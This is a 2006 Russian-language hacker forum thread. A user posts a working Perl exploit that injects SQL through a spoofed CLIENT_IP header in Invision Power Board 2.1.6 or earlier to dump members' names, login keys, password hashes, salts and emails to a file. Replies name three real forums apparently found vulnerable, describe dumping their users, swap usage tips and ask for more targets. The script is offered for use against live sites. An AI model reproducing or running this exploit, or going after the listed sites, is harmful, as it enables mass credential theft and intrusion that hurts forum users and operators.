Форумы IPB 2.1.6 Modified for User Database Dump Rst Sploit

Discussion in 'Уязвимости CMS/форумов' started by Driver, 29 Aug 2006.

  1. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    В общем на основе сплоита от РСТ для IPB <= 2.1.6 решил написать дампилку юзерской базы.
    Писал для себя вообще, ну решил здесь выложить, может кому еще пригодится...
    Впринципе удобно, весь процесс отображается в окне, а результат сохраняется в файле result.txt в каталоге в котором находится сплоит.
    Формат данных:

    Name: *
    Login Key: *
    Pass Hash: *
    Pass Salt: *
    E-Mail: *

    Кому не нравится - большая просьба просто воздержаться от каких либо комментариев, ругани в свой адресс от античатовцев я наслушался уже достаточно.

    Code:
    #!/usr/bin/perl
    
    use LWP::UserAgent;
    use Getopt::Std;
    
    getopts("p:i:P:f:t:");
    
    $path   = $opt_p;
    $from   = $opt_f; 
    $to     = $opt_t;
    $prefix = $opt_P || 'ibf_';
    
    $|++;
    
    if(!$path || !$from || !$to || ($from > $to)) { &usage; }
    &head();
    print "TEST FORUM ...";
    if(get_info($prefix,$id,0) == 1) { print " FORUM VULNERABLE\n"; }
    else { print " FORUM UNVULNERABLE\n"; exit(); }
    
    open(RES,">result.txt");
    
    for($i=$from;$i<$to;$i++) { get_info($prefix,$i,1); }
    
    sub get_info($$$)
     {
     $xpl = LWP::UserAgent->new( ) or die;
     $rep = '';
    if($_[2] == 1)
      {
      
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
      if(length($rep)!=32) { print "$_[1])\nName: $rep\n"; print RES "$_[1])\nName: $rep\n"; }
      else { print ""; }
      $name = $rep;
      
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT member_login_key,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.{32})"/) { $rep = $3; }
      if(length($name)==32) { print ""; }
      else { print "Login Key: $rep\n"; print RES "Login Key: $rep\n"; }
      
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_hash,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
      if(length($name)==32) { print ""; }
      else { print "Pass Hash: $rep\n"; print RES "Pass Hash: $rep\n"; }
        
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_salt,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
      if(length($rep)!=32) { print "Pass Salt: $rep\n"; print RES "Pass Salt: $rep\n"; }
      else { print ""; } 
     
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT email,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
      if(length($rep)!=32) { print "E-Mail: $rep\n\n"; print RES "E-Mail: $rep\n\n ****** \n\n"; }
      else { print ""; }
      }
     elsif($_[2] == 0)
      {
      $res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/**");
      if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
      if($rep eq 'VULN') { return 1; }
      else { return 0; }
      }
     }
     
    sub usage()
     {
     &head();
     print "| Usage:                                     |\n"; 
     print "| <sploit>.pl -p [path] -f [u_id] -t [u_id]  |\n";
     print "| -p [path] ~ path to index.php              |\n";
     print "| -f [num]  ~ get data from this id          |\n";
     print "| -t [num]  ~ get data to this id            |\n";
     print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
     exit();
     }
    
    sub head()
     {
     print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";   
     print "|          IPB <= 2.1.6 Users Dumper         |\n";
     print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
     print "|    Based on RST IPB <= 2.1.6 Mail Sploit   |\n";
     print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
     print "|             Modified by Driver             |\n";
     print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
     }
    
     
    5 people like this.
  2. K.e.H

    K.e.H New Member

    Joined:
    6 Aug 2005
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    чЕт он запускаться не хочет.Напиши пример че там писать надо
     
  3. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    2Driver Бугого как ты написал не зная perl ??
    З.Ы копирайты даже моя бабушка может подправить))
     
    1 person likes this.
  4. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Не, у меня вроде запустился, но че-то я так и не нашел уязвимого форума...
    Вообще штука была бы хорошая если б на свежую багу...
    А еще, неплохо чтоб писалось там "connecting", а если не коннектинг - то почему и т.п... а то даже непонятно, пытался сплойт в инет выйти или не..
     
  5. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    http://guild.murdoch.edu.au/forums/
    http://recserver.colorado.edu/forum/
    http://www.getskinned.org/forums/


    Вроде как vulnerablы своим сканером насканил - проверяйте )
     
  6. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Ну я perl тоже почти не знаю. А этот сплойт малось переделал(научил пароли к закрытым форумам тырить).
     
  7. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    А ты кто такой?
    P.S.: Я сказал, что чуть чуть передалал исходный сплоит, и не более того.
    Я же попросил - кому не нравится - не отписывайтесь...
    P.S.S.: Запускать как обычный сплоит, перлом.
     
  8. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    Со всех трех снял дампы. Вот первые 10 юзеров с каждого форума (дампит естественно только существующих юзеров, а перебирает весь указанный Вами диапазон ID по порядку):

    [mod]Диапазон был. Теперь удалён. Это не Халява, это Уязвимости форумов, а не уязвимые форумы. За флуд бить буду.(Последнее относится ко всем, кто отметился в топике)[/mod]
     
    #8 Driver, 29 Aug 2006
    Last edited by a moderator: 31 Aug 2006
  9. edos

    edos Member

    Joined:
    29 Aug 2005
    Messages:
    82
    Likes Received:
    18
    Reputations:
    9
    очень удобно, хотя мало уже их осталось


    и в файле все остается
     
  10. K.e.H

    K.e.H New Member

    Joined:
    6 Aug 2005
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Я так и запускаю.Не запускается хрень каккую- то пишет.Может защита от кидесов стойт?Я в перле не шарю.
     
  11. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Гы...Гы кинь что пишет хоть K.e.H, а то не хочеться проверять ))
     
  12. infothief

    infothief Member

    Joined:
    14 Nov 2005
    Messages:
    21
    Likes Received:
    10
    Reputations:
    3
    Сплойт работает. Всё круто. :d
    Драйвер молодец.
    Респект.
     
  13. K.e.H

    K.e.H New Member

    Joined:
    6 Aug 2005
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Test forum и дальше хрень всякую
     
  14. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Молодец сплойт класный!! Ты б не мог еще добавить чтоб аськи выдерала?
     
    1 person likes this.
  15. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Сплоит пашит, все отлично, нужно токо нормальный перл скачать, не качайте с denwer.ru, там отстойный, нормальный перл весит около 12мб
     
  16. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    K.e.H хахаха! Лолка- он пишет- Test Forum Unvulneralable- то есть форум неуязвим на эту багу или можно так сказать форум пропачен!
     
  17. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Бывает и такое =))))) Пробуй, есть и уязвимые хотя их ох как мало осталось..
     
  18. F.A.Q [R3x]

    F.A.Q [R3x] New Member

    Joined:
    26 Sep 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Клёвый ЕКСПЛОЙТ все работаеть =)
    РЕСПЕКТ
     
  19. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    ПРотестил всё! Неффтяк! Теперь надо порутать сервак! Спасиб за сплойт!
     
  20. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Люди выложите плиз парочку уязвимых форумов! А то своих уже неосталось!
     
Loading...